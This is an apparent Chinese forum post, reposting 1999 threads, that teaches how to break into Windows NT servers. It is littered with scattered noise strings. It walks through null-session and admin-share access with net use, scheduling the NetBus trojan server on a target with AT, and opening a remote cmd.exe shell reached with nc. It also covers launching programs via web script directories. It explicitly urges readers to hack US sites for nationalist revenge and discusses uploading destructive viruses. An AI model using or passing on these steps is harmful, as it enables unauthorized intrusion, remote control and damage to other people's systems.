找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
- F; c2 D/ p7 G+ T3 g2 a请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
/ @+ P. k. Y0 ^" A2 e> 我的机子MMX166,WIN98,2。5G,32M内存。
$ s2 l$ }; R* h7 B" m/ S5 u
( m6 y' l9 Q! A" F8 x. k/ b黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。9 J, r. x" g. {3 N4 c2 {
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
! |/ O1 O( G# _  B其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
( _' ^' {" x- \$ X9 i7 V9 Knet use \\111.111.111.111\ipc$ "" /user:""
! I9 K) t2 W9 r1 vnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
6 Y& f* a5 v1 G4 s: `% d, p4 jnet view \\111.111.111.111
6 L' z2 s8 n2 L# s/ p% m( z当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
4 e$ C5 F* V% P( V3 Xnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"4 v  D8 p& ~5 d& M, T
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
! r8 z: |7 e, t! R1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:+ h) ?8 L9 {; N, o4 h
net use x: \\111.111.111.111\c$0 t% j' Y! Q  d7 s
net use y: \\111.111.111.111\d$4 {: h9 a' m7 W5 Z9 {7 X* o  {1 s
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
0 t) v9 e/ g, w) X7 I' x- O2、管理目标NT的用户:, c% ?& o4 w5 g# ?3 y
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
5 `$ V* z! c; R( a键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样; Y: E4 y- p  u& U/ g
3、管理目标NT的服务
4 ]) ?/ A  c3 K选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”. P1 I7 `; }9 e3 c# K5 L; I
这样你可以管理目标NT上的服务,共享目录
/ }) a3 R- x. G5 ]: ~) H$ ^4、IIS管理
; s" S9 `4 H7 W1 \选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
* g; R) S; S5 g2 c目标NT的FTP、WWW服务你就可以重新配置, n" Y" D5 h2 \8 s
5、事件管理
# ]( ?* _4 x, ~0 r) L. S“事件查看器”->连接到服务器->111.111.111.1115 M: R0 \/ y/ ?- S* l* R
! J; ~: m2 m. }6 G/ z! b; Q. E
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
& m! @/ I0 ~" M* I: r) m
( A, B( b+ G5 \1 U当然,98,95也能做一些事情,但很麻烦,比如:
) D  D2 y, a( N" Z- dnet use \\111.111.111.111\ipc$
# ~; n+ H0 \3 Y7 e& rnet use z: \\111.111.111.111\d$6 |! x4 U' z1 h% T
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
7 X  U3 j: A0 d( z; _+ c+ f
! o' A5 \3 S+ s/ n! x* x6 v我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!/ a/ }/ j2 a+ T/ o# ^
这样,你还可以了解目标机器上能有什么东东供你去用!- ?7 Z* H4 m5 m# w" F' \- l

& p2 n( ?2 G+ G# R4 H
, g$ B$ G' P* r% A  \, |0 w8 j--------------------------------------------------------------------------------/ `! k3 ?' b  ]

5 S5 a1 Z% }6 u) U9 h- W>quack于1999-06-12,23:37:44
# q- Q4 t, r4 t2 p* B在大作《几个有关黑的问题》中提到:  G- S; P8 H. [. w4 L4 b4 y
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
& x( y9 }# X7 }8 p1 x  N$ c" i: c- ^4 ~9 j
killusa于1999-06-13,03:25:15# q4 K0 `7 ]: N1 }  O$ k
在大作《Re: 几个有关黑的问题》中提到:) a5 F- t* o4 c% T; h
& C! z6 R4 s  A
letmein.exe 暂时没有mypwd参数,十分抱歉
) T/ M+ r8 N' D6 A2 P! `pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
3 ~* r3 ^, ^, S" t6 U, C
+ ]: f+ \7 Q0 Z) v* gNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
, D1 E( ^( ^/ g3 q; Z服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:6 G5 I2 Z# m% P; p4 @9 D
, q3 k' d" O% J7 |/ J. I: v- g
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
) u: c' \' F5 N: n0 P$ l) b) H" P  M  [& H' y+ G
C:\>net start schedule
$ S% e" W! |7 J3 K( {Schedule 正在启动服务.....; b6 l7 @4 x& S$ `
Schedulw 服务启动成功。
3 X. A5 I% A  y1 d8 u0 Q7 u4 ^+ KC:\>at /?
" V  X# [6 K+ W" ZAT 命令排定在特定的日期和时间运行某些命令和程序。. o( A/ F" }- ^5 ~& E6 ?( p
运行 AT 命令之前必须先启动 Schedule 服务。
4 Z7 T" P+ j7 y( y& R+ ^( d; l' _9 }5 m5 m" K5 ?: a& g9 p
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]) O4 ]1 k- Q3 b" t# L) p2 q# b
AT [\\computername] time [/INTERACTIVE]! |6 T- ^# s$ f# j. C
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
; I. q" w5 k+ \, [/ A' Y# k+ W: ?. Z, Z: I+ ?
\\computername 指定远程计算机。 如果省略这个参数
; m9 O; @+ t9 o1 D命令会被排定在本机上运行。  Q: i$ T2 N6 r% A# @; t$ p3 B
id 指定给排定进度命令的识别号。
) s# h& K7 U& T% y5 z5 q" A# h6 S0 B+ y4 U) j
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。  i( o0 r1 s2 T. c4 {* O
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。  ]2 q0 O( L) B4 |1 w3 v% d. v9 E9 v
time 指定命令运行的时间。6 i7 `$ m# e$ N+ _
/interactive 允许作业在运行时,与用户通过桌面交互。
9 V3 \" ?9 j2 C9 g  @/ K9 E2 G6 x6 t" f! c& }) V
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
) b" s: x4 L6 ^1 T' W8 I% o' f如果省略日期,则默认为在每月的本日运行。* l+ K/ E/ T$ Y6 j6 e8 N4 f
6 |2 }/ p2 J# B9 |; D! a
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
* Z% x$ B/ N7 s# v* `- \
6 t5 G) ^  U9 [  j1 g2 Z"command" 准备运行的 Windows NT 命令或批处理文件。
/ X, p! K& g% \- n
( Q0 T7 P+ B) I  u9 vC:\>% K1 e6 \. i% Q& Q  Q. d. S
' a3 M7 `- K. j( G; H+ ]- G
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:; t' d5 X9 v8 S, z: M1 G/ A
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"! x- b% L+ m; C  _' W1 }; K0 [
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
' E: f+ u3 }0 Q2 Z4 M3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
. p" L) e& u  @, fat \\x.x.x.x 00:00 ntsrv.exe /port:64321
/ w/ ~) d% O! f8 y其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:4 e$ m0 x9 o& n4 {5 l  q' W
Microsoft(R) Windows NT(TM)
* z" l  e# `% _. D' }(C) Copyright 1985-1996 Microsoft Corp.7 ^2 `, |8 S' ^( D" i2 H( [& q
C:\>3 i  e4 H+ q# A. P7 s- {. d$ {
( p9 Q& U( a5 X8 j
2、利用web启动ntsrv.exe或其他程序在目的服务器% N6 W( ], T4 |$ q( U) w! R. F
' a0 ]3 G+ @$ F0 G
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:. U8 b  U: g8 C5 {
http://x.x.x.x/scripts/ntsrv.exe /port:64321
: V7 w, J1 ~( S+ R! Phttp://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
$ H0 x  m5 _, a( P该程序就启动了  D3 {) d+ l, J+ K6 `7 S& Z+ Y
5 u  o/ Q# O6 W- h: B
我只提这几中方法!" j9 t& ^- r; j8 M1 G! o8 `
要成功,必须打好基础工,对操作系统充分了解!
+ f. [3 K7 f+ G; r  d2 c; W; ~; E/ R( Y: `+ S0 g
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-6-14 23:29

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表